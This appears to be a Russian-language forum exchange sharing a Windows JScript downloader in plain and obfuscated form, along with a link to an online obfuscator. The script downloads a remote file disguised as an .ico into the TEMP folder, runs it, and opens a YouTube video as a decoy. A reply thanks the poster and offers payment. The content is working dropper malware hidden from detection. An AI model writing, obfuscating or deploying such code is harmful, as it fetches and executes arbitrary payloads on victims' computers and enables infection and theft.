Бесплатно, вот тут обфусцируешь https://codebeautify.org/javascript-obfuscator
var WshShell = WScript.CreateObject("WScript.Shell");
var filepath = WshShell.ExpandEnvironmentStrings("%TEMP%") + "/Downloader.ico";
var url = "https://127.0.0.1/img/1.ico"
var xhr = new ActiveXObject("MSXML2.XMLHTTP")
xhr.open("GET", url, false)
xhr.send()
var fso = new ActiveXObject("Scripting.FileSystemObject")
if (fso.FileExists(filepath) == false) {
var stream = new ActiveXObject("ADODB.Stream")
stream.Open()
stream.Type = 1
stream.Write(xhr.ResponseBody)
stream.Position = 0
stream.SaveToFile(filepath, 2)
stream.Close()
}
var shell = WScript.CreateObject("WScript.Shell")
shell.Run(filepath)
shell.Run("https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstley?autoplay=1")function _0x508c() {
var _0x11d13c = ['HTTP', '40kBxlUj', '51834jaSozl', 'CreateObje', 'split', '5|4|1|3|0|', '72TKwKir', 'SaveToFile', 'ell', 'r/img/1.ic', 'GET', 'Run', 'Scripting.', 'FileExists', '284913xzBbPF', 'WScript.Sh', '2|6', 'Open', 'https://go', 'ResponseBo', 'ogle.com', 'https://ne', 'Object', '51LvcEUw', '%TEMP%', '/Downloade', 'Type', 'r.ico', '5186855CpNAgA', 'send', 'ronmentStr', '156863UMYDMM', 'ings', 'Position', 'open', '404500bgnKOB', 'MSXML2.XML', 'Close', '56lLoLtX', 'Write', '6798902LiLOXP', 'ExpandEnvi', 'ADODB.Stre', 'FileSystem', 'wpariswl.f', '268612OeZNbS'];
_0x508c = function() {
return _0x11d13c;
};
return _0x508c();
}
var _0x48c434 = _0x2fa5;
(function(_0x1663f5, _0x30d329) {
var _0xa11f16 = _0x2fa5,
_0xd7cde2 = _0x1663f5();
while (!![]) {
try {
var _0x1f748f = -parseInt(_0xa11f16(0x1c0)) / (0xc3a + -0x1 * -0x2593 + -0x31cc) * (-parseInt(_0xa11f16(0x1b6)) / (0x20 * 0xec + 0xc61 + -0x29df)) + parseInt(_0xa11f16(0x1a7)) / (-0x5 * 0x22e + 0x79d * -0x3 + 0x14 * 0x1b0) * (parseInt(_0xa11f16(0x1bd)) / (0x257 + 0x260 * -0x1 + -0x1 * -0xd)) + -parseInt(_0xa11f16(0x1ac)) / (-0x11ac + 0x69d * 0x4 + 0x1 * -0x8c3) + parseInt(_0xa11f16(0x1c4)) / (-0x3cb * 0x1 + -0x4 * 0x1b6 + 0xaa9) * (-parseInt(_0xa11f16(0x1af)) / (-0x26dd + 0x2193 + 0x551)) + -parseInt(_0xa11f16(0x1bf)) / (-0x53 * 0x55 + -0x899 + 0x304 * 0xc) * (-parseInt(_0xa11f16(0x1cc)) / (0x6d * -0x15 + -0xe4f + 0x1749)) + -parseInt(_0xa11f16(0x1b3)) / (0x530 + 0x709 * -0x1 + 0x1e3) + -parseInt(_0xa11f16(0x1b8)) / (-0x1daa + -0x8db * 0x4 + 0x4121);
if (_0x1f748f === _0x30d329) break;
else _0xd7cde2['push'](_0xd7cde2['shift']());
} catch (_0x48cc25) {
_0xd7cde2['push'](_0xd7cde2['shift']());
}
}
}(_0x508c, -0x1 * -0xeb575 + 0x15cde1 + -0x18835b));
var WshShell = WScript[_0x48c434(0x1c1) + 'ct'](_0x48c434(0x1cd) + _0x48c434(0x1c6)),
filepath = WshShell[_0x48c434(0x1b9) + _0x48c434(0x1ae) + _0x48c434(0x1b0)](_0x48c434(0x1a8)) + (_0x48c434(0x1a9) + _0x48c434(0x1ab)),
url = _0x48c434(0x1a5) + _0x48c434(0x1bc) + _0x48c434(0x1c7) + 'o',
xhr = new ActiveXObject(_0x48c434(0x1b4) + _0x48c434(0x1be));
xhr[_0x48c434(0x1b2)](_0x48c434(0x1c8), url, ![]), xhr[_0x48c434(0x1ad)]();
var fso = new ActiveXObject(_0x48c434(0x1ca) + _0x48c434(0x1bb) + _0x48c434(0x1a6));
function _0x2fa5(_0x2370fc, _0x547109) {
var _0x2fbfcb = _0x508c();
return _0x2fa5 = function(_0x1433c1, _0x1fa1c3) {
_0x1433c1 = _0x1433c1 - (-0x1 * 0x367 + -0x73f + 0xc46);
var _0x59e104 = _0x2fbfcb[_0x1433c1];
return _0x59e104;
}, _0x2fa5(_0x2370fc, _0x547109);
}
if (fso[_0x48c434(0x1cb)](filepath) == ![]) {
var IHCEoA = (_0x48c434(0x1c3) + _0x48c434(0x1a0))[_0x48c434(0x1c2)]('|'),
SZUxdr = -0xa99 * 0x2 + 0x9a7 * 0x2 + 0x16 * 0x16;
while (!![]) {
switch (IHCEoA[SZUxdr++]) {
case '0':
stream[_0x48c434(0x1b1)] = 0x1 * -0x1cf5 + 0xa89 + 0x83 * 0x24;
continue;
case '1':
stream[_0x48c434(0x1aa)] = -0x207d * 0x1 + 0x1bb2 + 0x1 * 0x4cc;
continue;
case '2':
stream[_0x48c434(0x1c5)](filepath, 0xb9f + -0xe63 + 0x2c6);
continue;
case '3':
stream[_0x48c434(0x1b7)](xhr[_0x48c434(0x1a3) + 'dy']);
continue;
case '4':
stream[_0x48c434(0x1a1)]();
continue;
case '5':
var stream = new ActiveXObject(_0x48c434(0x1ba) + 'am');
continue;
case '6':
stream[_0x48c434(0x1b5)]();
continue;
}
break;
}
}
var shell = WScript[_0x48c434(0x1c1) + 'ct'](_0x48c434(0x1cd) + _0x48c434(0x1c6));
shell[_0x48c434(0x1c9)](filepath), shell[_0x48c434(0x1c9)](_0x48c434(0x1a2) + _0x48c434(0x1a4));Благодарю, все работает! Готов накинуть на печеньки или сигареты
